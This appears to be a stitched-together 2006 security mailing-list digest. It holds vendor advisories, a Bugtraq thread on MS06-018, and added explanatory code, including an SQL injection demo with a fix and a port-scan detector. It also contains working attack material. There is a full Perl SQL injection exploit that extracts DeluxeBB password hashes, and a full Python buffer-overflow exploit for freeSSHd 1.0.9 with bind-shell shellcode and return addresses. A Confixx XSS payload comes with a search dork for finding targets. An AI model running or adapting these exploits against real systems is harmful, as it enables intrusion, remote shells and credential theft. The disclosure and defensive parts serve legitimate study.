======================================================================
5) Time Table

12/05/2006 - Initial vendor notification.
15/05/2006 - Initial vendor reply.
15/05/2006 - Public disclosure.

======================================================================
6) Credits

Discovered by Tan Chew Keong, Secunia Research.

======================================================================
7) References

SA19945: http://secunia.com/advisories/19945/

The Common Vulnerabilities and Exposures (CVE) project has assigned CVE-2006-2161 for the vulnerability.

======================================================================
8) About Secunia

Secunia collects, validates, assesses, and writes advisories regarding all the latest software vulnerabilities disclosed to the public. These advisories are gathered in a publicly available database at the Secunia website:

http://secunia.com/

Secunia offers services to our customers enabling them to receive all relevant vulnerability information to their specific system configuration.

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/secunia_security_advisories/

======================================================================
9) Verification

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2006-31/advisory/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

======================================================================
[USN-284-1] Quagga vulnerabilities
===========================================================
Ubuntu Security Notice USN-284-1                May 15, 2006
quagga vulnerabilities
CVE-2006-2223, CVE-2006-2224, CVE-2006-2276
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 5.04 (Hoary Hedgehog)
Ubuntu 5.10 (Breezy Badger)

The following packages are affected:

quagga

The problem can be corrected by upgrading the affected package to version 0.97.3-1ubuntu1.1 (for Ubuntu 5.04), or 0.99.1-1ubuntu1.1 (for Ubuntu 5.10). In general, a standard system upgrade is sufficient to effect the necessary changes.

Details follow:

Paul Jakma discovered that Quagga's ripd daemon did not properly handle authentication of RIPv1 requests. If the RIPv1 protocol had been disabled, or authentication for RIPv2 had been enabled, ripd still replied to RIPv1 requests, which could lead to information disclosure. (CVE-2006-2223)

Paul Jakma also noticed that ripd accepted unauthenticated RIPv1 response packets if RIPv2 was configured to require authentication and both protocols were allowed. A remote attacker could exploit this to inject arbitrary routes. (CVE-2006-2224)

Fredrik Widell discovered that Quagga did not properly handle certain invalid 'sh ip bgp' commands. By sending special commands to Quagga, a remote attacker with telnet access to the Quagga server could exploit this to trigger an endless loop in the daemon (Denial of Service). (CVE-2006-2276)

Updated packages for Ubuntu 5.04:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.97.3-1ubuntu1.1.diff.gz
      Size/MD5:    38413 eda4c03884896ba450f16ee70f8c082a
    http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.97.3-1ubuntu1.1.dsc
      Size/MD5:      714 22a7196923c807617fcd995c01c340b1
    http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.97.3.orig.tar.gz
      Size/MD5:  1964834 9015a5c61b22dc4e51b07fdc9bdadfd1

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga-doc_0.97.3-1ubuntu1.1_all.deb
      Size/MD5:   477692 15527f6d3580a5327a31a6244cfc78f7

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)

    http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.97.3-1ubuntu1.1_amd64.deb
      Size/MD5:  1345612 75b7044e62475f2b4b6bf4a2c682f681

  i386 architecture (x86 compatible Intel/AMD)

    http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.97.3-1ubuntu1.1_i386.deb
      Size/MD5:  1124086 9ff534e9d6a717b340d448b486f5a8de

  powerpc architecture (Apple Macintosh G3/G4/G5)

    http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.97.3-1ubuntu1.1_powerpc.deb
      Size/MD5:  1245250 acaa9feaf12f20e42407d25103b698bd

Updated packages for Ubuntu 5.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.99.1-1ubuntu1.1.diff.gz
      Size/MD5:    27760 5577e4835dca7dce5d857ca843c43358
    http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.99.1-1ubuntu1.1.dsc
      Size/MD5:      722 f2690f9ed75e966362870c591e4e5a72
    http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.99.1.orig.tar.gz
      Size/MD5:  2107583 afd8c23a32050be76e55c28ec9dcff73

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga-doc_0.99.1-1ubuntu1.1_all.deb
      Size/MD5:   580362 af8e02b1ef292dc9e883a24b644d3e3f

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)

    http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.99.1-1ubuntu1.1_amd64.deb
      Size/MD5:  1418614 6d36f2bc13d16f87d8bed040dfdfcc0d

  i386 architecture (x86 compatible Intel/AMD)

    http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.99.1-1ubuntu1.1_i386.deb
      Size/MD5:  1204568 39d90181e76908dabf23d4bee37c220e
Confixx <= 3.1.2 Code Injection

// Confixx <= 3.1.2 Code Injection //
-
[~] Advisory by: LoK-Crew
[-] Exploit: http://www.example.com/ftplogin/?login=";[XSS]<div style=
[-] Googledork: inurl:confixx inurl:login|anmeldung
[+] Greetz to: Bluegeek
[+] Visit: www.LoK-Crew.de
YapBB <= 1.2 Beta2 'find.php' SQL Injection Vulnerability

Title     : YapBB <= 1.2 Beta2 'find.php' SQL Injection Vulnerability
--
Author    : x90c(Kyong Joo, Jung)
Published : 2006.5.16
E-mail    : geinblues [at] gmail.com
Site      : http://www.chollian.net/~jyj9782
--

0x01 Summary

YapBB is an open-source web forum written in PHP. (http://sourceforge.net/projects/yapbb) This web program is vulnerable to SQL injection attack, so a malicious attacker can get every nickname (id) and password for this YapBB. Let's see the code ~!

0x02 Testbed

- Fedora Core 2
- MySQL-Server 5.0.19-log
- PHP5 ( magic_quotes_gpc = On )

0x03 Codes

~/YapBB-1.2-Beta2/YapBB/find.php:
-
..
34:  $userBool = $HTTP_POST_VARS[choice]=="user";            // if choice == 'user'
36:  $userpostBool = !empty($HTTP_GET_VARS[userID]);         // userID == '[inject sql]'
..
119: else if ($userpostBool)
120: {
128:     $postRes = $postQuery->select("SELECT p.date, t.id, t.description, u.nickname FROM " . $cfgDatabase['post'] . " AS p, " . $cfgDatabase['topic'] . " AS t, " . $cfgDatabase['user'] . " AS u WHERE t.id = p.topicid AND p.posterid = $userID AND u.id = p.posterid GROUP BY p.topicid ORDER BY p.date DESC LIMIT 50");   // execute sql!
-
No words. I wrote an exploit for getting all YapBB users' nicknames and passwords. Sorry, I can't put the exploit in this advisory =)

0x04 Exploit

[EMAIL PROTECTED] testbed]$ whoami
x90c
[EMAIL PROTECTED] testbed]$

0x05 Patch

~/YapBB-1.2-Beta2/YapBB/find.php:
..
128:     $postRes = $postQuery->select("SELECT p.date, t.id, t.description, u.nickname FROM " . $cfgDatabase['post'] . " AS p, " . $cfgDatabase['topic'] . " AS t, " . $cfgDatabase['user'] . " AS u WHERE t.id = p.topicid AND p.posterid = '" . addslashes($userID) . "' AND u.id = p.posterid GROUP BY p.topicid ORDER BY p.date DESC LIMIT 50");   // x90c patch!
..

Thanks! - Blu3h4t Team in korea
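The Azboard and YapBB advisories above show the same defect, a request value concatenated into the SQL text, and YapBB's patch answers it with quotes plus addslashes. The following is an added example (not code from either project or advisory) that reproduces the shape of find.php line 128 against a constructed SQLite schema, runs the kind of UNION payload the advisory alludes to through the concatenating version, and then runs the same payload through a version that binds the value as a parameter. The table and column names are assumptions chosen to match the query; the passwords are sample data. Binding is the stronger fix because the database never parses the value at all, whereas addslashes only helps while the value is inside a quoted literal and the escaping matches the connection's charset:

```python
import sqlite3


def make_db():
    """Constructed sample schema shaped like the post/topic/user tables in the query."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE user(id INTEGER, nickname TEXT, password TEXT);
        CREATE TABLE topic(id INTEGER, description TEXT);
        CREATE TABLE post(topicid INTEGER, posterid INTEGER, date TEXT);
        INSERT INTO user VALUES (1, 'admin', 's3cret'), (2, 'bob', 'hunter2');
        INSERT INTO topic VALUES (10, 'hello');
        INSERT INTO post VALUES (10, 1, '2006-05-16');
    """)
    return con


# Kept on one logical line on purpose: a "--" in the payload comments out
# everything after it up to end of line, exactly as it would in find.php.
QUERY_HEAD = ("SELECT p.date, t.id, t.description, u.nickname "
              "FROM post AS p, topic AS t, user AS u "
              "WHERE t.id = p.topicid AND p.posterid = ")
QUERY_TAIL = " AND u.id = p.posterid ORDER BY p.date DESC LIMIT 50"


def find_posts_vulnerable(con, user_id):
    """find.php line 128 shape: the request value is pasted into the SQL text."""
    return con.execute(QUERY_HEAD + str(user_id) + QUERY_TAIL).fetchall()


def find_posts_fixed(con, user_id):
    """Bound parameter: the value travels separately from the SQL, so it is
    compared against p.posterid and never parsed as SQL."""
    return con.execute(QUERY_HEAD + "?" + QUERY_TAIL, (user_id,)).fetchall()


# Four columns to match the four in the outer SELECT; nickname/password land
# in the columns the page would render as "description" and "nickname".
PAYLOAD = "0 UNION SELECT password, id, nickname, password FROM user --"

if __name__ == "__main__":
    con = make_db()
    print("legit userID=1, vulnerable:", find_posts_vulnerable(con, 1))
    print("payload, vulnerable:      ", find_posts_vulnerable(con, PAYLOAD))
    print("payload, bound parameter: ", find_posts_fixed(con, PAYLOAD))
```

Against MySQL the same payload needs the trailing "-- " with a space (or "#"), and magic_quotes_gpc being On, as in the testbed, does not matter here: the payload contains no quote characters, which is precisely why an unquoted numeric context is exploitable regardless of quoting filters.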
DeluxeBB 1.06 Remote SQL Injection Exploit
#!/usr/bin/perl
use IO::Socket;

print q{
#
#   DeluxeBB 1.06 Remote SQL Injection Exploit
#
#   exploit discovered and coded
#   by KingOfSka
#
#   http://contropotere.netsons.org
#
};

if (!$ARGV[2]) {
    print q{
Usage: perl dbbxpl.pl host /directory/ victim_userid

       perl dbbxpl.pl www.somesite.com /forum/ 1
};
    exit();
}

$server = $ARGV[0];
$dir    = $ARGV[1];
$user   = $ARGV[2];
$myuser = $ARGV[3];
$mypass = $ARGV[4];
$myid   = $ARGV[5];

print "\r\n";
print "[ ] SERVER: $server\r\n";
print "[ ]    DIR: $dir\r\n";
print "[ ] USERID: $user\r\n";
print "\r\n\r\n";

$server =~ s/(http:\/\/)//eg;    # strip a leading scheme if one was given
$path = $dir;
# UNION the password column into the profile lookup for the victim's uid
$path .= "misc.php?sub=profile&name=0')+UNION+SELECT+0,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM%20deluxebb_users%20WHERE%20(uid='" . $user;

print "[~] PREPARE TO CONNECT...\r\n";
$socket = IO::Socket::INET->new(
    Proto    => "tcp",
    PeerAddr => $server,
    PeerPort => 80
) || die "[-] CONNECTION FAILED";
print "[+] CONNECTED\r\n";
print "[~] SENDING QUERY...\r\n";
print $socket "GET $path HTTP/1.1\r\n";
print $socket "Host: $server\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\r\n";
print "[+] DONE!\r\n\r\n";
print "--[ REPORT ]\r\n";
while ($answer = <$socket>) {
    if ($answer =~ /(\w{32})/) {        # first 32-character word: the MD5 hash
        if ($1 ne 0) {
            print "Password Hash is: " . $1 . "\r\n";
            print "--\r\n";
        }
        exit();
    }
}
print "\r\n";
Re: [Full-disclosure] POC exploit for freeSSHd version 1.0.9
Also available in Metasploit framework:
http://metasploit.com/projects/Framework/modules/exploits/freesshd_key_exchange.pm

david maciejak


Hi all,

Attachment is the POC exploit for freeSSHd version 1.0.9

Advisories:
http://www.securityfocus.com/bid/17958
http://www.frsirt.com/english/advisories/2006/1786

This was coded for educational purposes.

Regards,
Tauqeer Ahmad


#!/usr/bin/env python
# Coded by Tauqeer Ahmad a.k.a 0x-Scientist-x0
# ahmadtauqeer[at]yahoo.com
#
# Disclaimer: This Proof of concept exploit is for educational purposes only.
# Please do not use it against any system without prior permission.
# You are responsible for yourself for what you do with this code.
#
# Greetings: All the Pakistani White Hats including me ;)
# Flames: To all the skript kiddies out there. Man grow up!
#
# Code tested against freeSSHd version 1.0.9
# If you didn't get shell at first try, try few times and you will get lucky
#
# Advisories:
# http://www.securityfocus.com/bid/17958
# http://www.frsirt.com/english/advisories/2006/1786

import socket
import getopt
import sys

host = "192.168.0.2"   # overridden by -h
port = 0               # overridden by -p
eip = ""               # return address selected by -o

#/* win32_bind - EXITFUNC=thread LPORT=1977 Size=317 Encoder=None http://metasploit.com */
shellcode = "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45" \
            "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49" \
            "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d" \
            "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66" \
            "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61" \
            "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40" \
            "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32" \
            "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6" \
            "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09" \
            "\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0" \
            "\x66\x68\x07\xb9\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff" \
            "\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53" \
            "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff" \
            "\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64" \
            "\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89" \
            "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab" \
            "\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51" \
            "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53" \
            "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6" \
            "\x52\xff\xd0\x68\xef\xce\xe0\x60\x53\xff\xd6\xff\xd0"


def exploit():
    # Client identification string "SSH-1.99-OpenSSH_3.4\n" followed by the
    # start of an SSH binary packet (length, padding length, SSH_MSG_KEXINIT).
    buff = "\x53\x53\x48\x2d\x31\x2e\x39\x39\x2d\x4f\x70\x65\x6e\x53\x53\x48" \
           "\x5f\x33\x2e\x34\x0a\x00\x00\x4f\x04\x05\x14\x00\x00\x00\x00\x00" \
           "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\xde"
    buff = buff + "A" * 1055        # filler up to the overwritten return address
    buff = buff + eip               # JMP ESP address chosen with -o
    buff = buff + ""
    buff = buff + "\x90" * 4        # NOP sled
    buff = buff + shellcode
    buff = buff + "B" * 19021 + "\r\n"

    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((host, port))
    print "[+] Received reply from server: " + sock.recv(1000)
    sock.send(buff)
    print "[+] SSHD exploited. Now telnet to port 1977 to get shell"
    print "[+] If you didn't get shell on first try, try again until you succeed"
    sock.close()
    sock = None


def usage():
    print "#################################"
    print "#     CODED BY TAUQEER AHMAD    #"
    print "#           Scientist           #"
    print "#################################"
    print "\n"
    print "Usage: %s -h hostip -p port -o OS" % sys.argv[0]
    print "Following OS supported\n"
    print "1 Window XP SP1"
    print "2 Window XP SP2"
    print "3 Windows 2000 Advanced Server"


if __name__ == '__main__':
    if len(sys.argv) < 7:
        usage()
        sys.exit()
    try:
        options = getopt.getopt(sys.argv[1:], 'h:p:o:')[0]
    except getopt.GetoptError, err:
        print err
        usage()
        sys.exit()
    for option, value in options:
        if option == '-h':
            host = value
        if option == '-p':
            port = int(value)
        if option == '-o':
            if value == '1':
                eip = "\xFC\x18\xD7\x77"  # 77D718FC JMP ESP IN USER32.dll (Windows Xp professional SP1)
            elif value == '2':
                eip = "\x0A\xAF\xD8\x77"  # 77D8AF0A JMP ESP IN USER32.DLL (Windows Xp professional SP2)
            elif value == '3':
                eip = "\x4D\x3F\xE3\x77"  # 77E33F4D
    exploit()
RE: Is MS06-018 a DoS or a system compromise ?
Hello Nick and people on the list

I have seen 2 servers last month which have been hacked and actively used to scan TCP 3372 on foreign IPs. These were servers which had port 3372 accessible (a firewall rule misconfiguration was making TCP ports > 3000 accessible on the Internet).

I was not able to find any tool which was used to hack the server on this port, but I think DTC was the culprit. These servers had also port 53 (DNS) accessible; they were running win2k with about 3 weeks of patches missing; no other services were on (no IIS, server service turned off, only TCP/IP bound on the NIC, ...).

I found tools on the hacked servers: infoscan.exe 1.0 from uhhuhy (cnhonker.com), and dfind.exe from class101.org, and log files of recent scans which corresponded to the complaints the server's owner received. The tools were placed in the recycler directory; the hacker seems to have been able to send commands or get a remote shell.

I'd be interested to hear information about remote code execution on this port if you find some; these details make me think a serious problem exists in the DTC service.

Thanks and have a nice day

Maxime Ducharme

-----Original Message-----
From: Nick Boyce [mailto:[EMAIL PROTECTED]
Sent: 13 May 2006 20:25
To: bugtraq@securityfocus.com
Subject: Is MS06-018 a DoS or a system compromise ?

There seems to be some confusion in MS Security Bulletin MS06-018, "Vulnerability in Microsoft Distributed Transaction Coordinator".

The bulletin itself (http://www.microsoft.com/technet/security/bulletin/ms06-018.mspx) states:

  An attacker could cause the Microsoft Distributed Transaction Coordinator (MSDTC) to stop responding. Note that the denial of service vulnerability would not allow an attacker to execute code or to elevate their user rights, but it could cause the affected system to stop accepting requests.

whereas the linked download pages for both the Win2K and WinXP patches

  http://www.microsoft.com/downloads/details.aspx?familyid=8B98F380-0E5C-4B80-9710-95E1B35AFD83&displaylang=en
  http://www.microsoft.com/downloads/details.aspx?familyid=D80B43B2-727B-46B6-82D1-F2CBD916FE32&displaylang=en

state:

  A security issue has been identified in the Microsoft Distributed Transaction Controller service that could allow an attacker to compromise your Windows-based system and gain control over it.

The related McAfee advisory (http://seclists.org/lists/bugtraq/2006/May/0215.html) states:

  Exploitation can at most lead to a denial of service and therefore the risk factor is at medium.

so I guess DoS is what it is ... but it would still be nice if someone in the know could confirm the download pages are wrong. Anyone from Microsoft here?

Cheers
Nick Boyce
--
One way to make your old car run better is to look up the price of a new model.
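Maxime's compromised servers were noticed because they were sweeping TCP 3372 on foreign addresses and the scan logs matched the complaints that came in. The following is an added example, not part of the thread, of the detection a SOC would run over its own connection logs to catch that pattern earlier: for each internal source it counts distinct destinations reached on a given port inside a sliding window and flags sources whose fan-out exceeds a threshold. The one-line-per-connection log format, the function names, the thresholds and the records produced by constructed_log() are assumptions made for this example, not data from the servers in the thread.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed record form: "<ISO timestamp> <src ip> <dst ip> <dst port>", one
# connection per line. The records from constructed_log() below are made up
# for this example, not taken from the servers described in the thread.
LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\d+)$")


def parse(lines):
    """Yield (timestamp, src, dst, dport) tuples, skipping malformed lines."""
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            yield datetime.fromisoformat(m.group(1)), m.group(2), m.group(3), int(m.group(4))


def find_scanners(lines, port=3372, window=timedelta(minutes=5), min_targets=20):
    """Return {src: peak distinct destinations} for every source that reached at
    least min_targets distinct hosts on `port` inside some `window`-long span."""
    by_src = defaultdict(list)
    for ts, src, dst, dport in parse(lines):
        if dport == port:
            by_src[src].append((ts, dst))
    hits = {}
    for src, events in by_src.items():
        events.sort()
        peak = 0
        for i, (ts, _) in enumerate(events):
            # distinct destinations seen in the window ending at this event
            recent = {d for t, d in events[:i + 1] if t >= ts - window}
            peak = max(peak, len(recent))
        if peak >= min_targets:
            hits[src] = peak
    return hits


def constructed_log():
    """Constructed records: one host sweeping TCP 3372 across a /24, one host
    talking MSDTC to two partners at a normal rate, plus unrelated web traffic."""
    base = datetime(2006, 4, 20, 10, 0, 0)
    lines = []
    for i in range(25):      # sweep: 25 different external hosts in about 75 s
        lines.append("%s 10.0.0.5 203.0.113.%d 3372" % ((base + timedelta(seconds=3 * i)).isoformat(), i + 1))
    for i in range(6):       # legitimate: two partners, one connection every 10 minutes
        lines.append("%s 10.0.0.9 198.51.100.%d 3372" % ((base + timedelta(minutes=10 * i)).isoformat(), i % 2 + 1))
    for i in range(30):      # unrelated HTTP from the sweeping host
        lines.append("%s 10.0.0.5 192.0.2.%d 80" % ((base + timedelta(seconds=i)).isoformat(), i + 1))
    return lines


if __name__ == "__main__":
    print(find_scanners(constructed_log()))  # {'10.0.0.5': 25}
```

The same function run with port=80 flags the web traffic instead, which is why the port argument matters: the signal is fan-out on a service port that a server should only ever talk to a handful of partners on, such as MSDTC's 3372, not volume as such. The complementary control from Maxime's account is the firewall side: the service should not have been reachable from the Internet in the first place.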